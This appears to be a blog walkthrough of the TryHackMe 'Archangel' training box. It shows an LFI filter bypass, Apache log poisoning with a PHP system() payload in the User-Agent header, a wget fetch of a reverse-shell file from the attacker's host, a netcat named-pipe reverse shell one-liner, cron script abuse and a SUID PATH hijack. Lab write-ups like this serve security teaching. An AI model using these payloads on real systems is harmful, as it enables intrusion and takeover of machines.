Tryhackme: Archangel — WalkThrough
Today, we will be doing an easy box from TryHackMe called Archangel which is labeled as a beginner-level room that aims at teaching web enumeration, local file inclusion, source code analysis, apache log poisoning, privilege escalation, and path variable misconfigurations. Without further ado, let’s connect to our THM OpenVPN network and start hacking!!!
Enumeration
Lets spin up our nmap tool and start scanning the machine for open ports.
From the results above, we can clearly see that we have two ports open: 80 (HTTP) and 22 (SSH). We have no user information, so we will keep SSH in our back pocket, and let’s dig into the website since HTTP has a larger attack surface.
After snooping around for some time, a support email was found with the domain ‘mafialive.thm’. Lets extract some info about this site.
Simply visiting the domain ‘mafialive.thm’ won’t get you there. There is a concept of Virtual Private Hosting applied here so we need to add this site to our /etc/hosts file and its corresponding IP address is that of the box. There should be no problem now and cool, we get our first flag.
After scanning for the hidden directories and files using the gobuster tool, a suspicious file ‘test.php’ was found. Lets check it out.
The screenshot from the mafialive.thm/test.php is given below.
A button is there, why wait to click? We can see the website is including the local PHP file using the view parameter and displaying it for us. This could be a sign of Local File Inclusion (LFI) vulnerability. Let’s throw in our payloads.
I tried to read /etc/passwd using the relative directories approach but it failed with the error message “Sorry, Thats not allowed”.
Source Code Review
I tried various payloads to exploit the LFI, but everything failed. I think it’s time to fire up the PHP wrappers. By using the convert.base64-encode filter, we can obtain the base64-encoded version of the local PHP file which then could be easily decoded for the source code analysis.
This is the decoded version of the file “test.php”. Lets review the PHP code.
We can see a filter that has been applied through containStr() function to prevent the LFI attacks. This means the view parameter can only include those files which start with “/var/www/html/development_testing” and it shouldn’t contain the “../..” string which could be abused for path traversal.
A well-known bypass for this filter is to use alternating dots and double-dots “./.././../”. Lets test this technique.
I tried to read the /etc/passswd. Voila! It worked.
Log Poisoning
We can read almost any files within the box with this power. However, nothing sensitive was found after some recon. Since we can read the log files (error.log and access.log) present in the /var/log/apache2 directory, the box can be exploited using the log poisoning vulnerability. Let see if that works.
I can see that all my requests are logged to this file, which means I can insert PHP code and execute it by including the access.log file in the URL. For that, we will replace the User-Agent header value with the malicious PHP code. I am using the curl command with the -H(header) flag for this purpose. This will get our code logged into the log file.
curl ‘http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././var/log/apache2/access.log’ -H ‘User-Agent: <?php system($_GET[‘cmd’]); ?>’
Lets validate the exploit by executing a command on the system remotely thorough the ‘cmd’ parameter. Lets try the ‘id’ command.
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././var/log/apache2/access.log&cmd=id
Cool! This works. You can find the ‘id’ command output inside the log file somewhere. This means Remote Code Execution.
Exploit
Since we have RCE on the box, there are several methods you can use to obtain a reverse shell on our local machine. I will try uploading the reverse-shell.php from pentest-monkey to the machine. I setup up a python HTTP Server on my local machine then used wget to upload the file.
mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././var/log/apache2/access.log&cmd=wget 10.9.147.137:8000/shell.php -O /tmp/reverse.php
Lets start a netcat listener on port 9001 and execute the PHP code with the following URL.
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././var/log/apache2/access.log&cmd=chmod 777 /tmp/reverse.php; php /tmp/reverse.php
Obtaining the user flag
I am user www-data at the moment. Inside the archangel’s home directory resides our user flag.
Privilege Escalation
After a bit of enumeration on the machine, I found a cron-job under archangel user running every minute. It is executing the script /opt/helloworld.sh.
After checking the script, I was amazed to find out that it can be edited and executed by any user. Let’s put the reverse-shell code inside the script and start a Netcat listener on port 8888. Here is our payload.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.147.137 8888 >/tmp/f
And we obtain a shell which is of user archangel.
Hopping into the secret folder, there I found user2 flag. Now its time to own the root flag.
Obtaining the root flag
Along with the user2 flag, a binary file named ‘backup’ is also present inside the folder. This ELF executable has the SUID bit set, which means we can execute this binary with the effective user-id of the root user.
One cool way to look inside the binaries for human-readable strings is by using the strings command. You can see its output below.
We can also use ghidraRun for total reverse-engineering of the binary. We dissected the code and there we obtain the main function which contains a suspicious command cp. This does not use the full path for cp, which means it is vulnerable to a Path Variable Privilege Escalation. By default on Linux, most variables are under sbin or bin. However we can create our own path variable for cp so when we execute this file, it will execute the cp located in our path.
Our cp command will actually contain “/bin/bash” inside which means once the binary runs, it will pop the root user’s command shell for us. There is a root.txt file waiting for us inside the /root directory.
Such a nice box! Happy Hacking!!!
Founder of cybersecnerds.com. Electronics Engineer by profession, Security Engineer by passion.
I am a Linux Enthusiast and highly interested in the offensive side of the CyberSec industry. You will find me reading InfoSec blogs most of the time.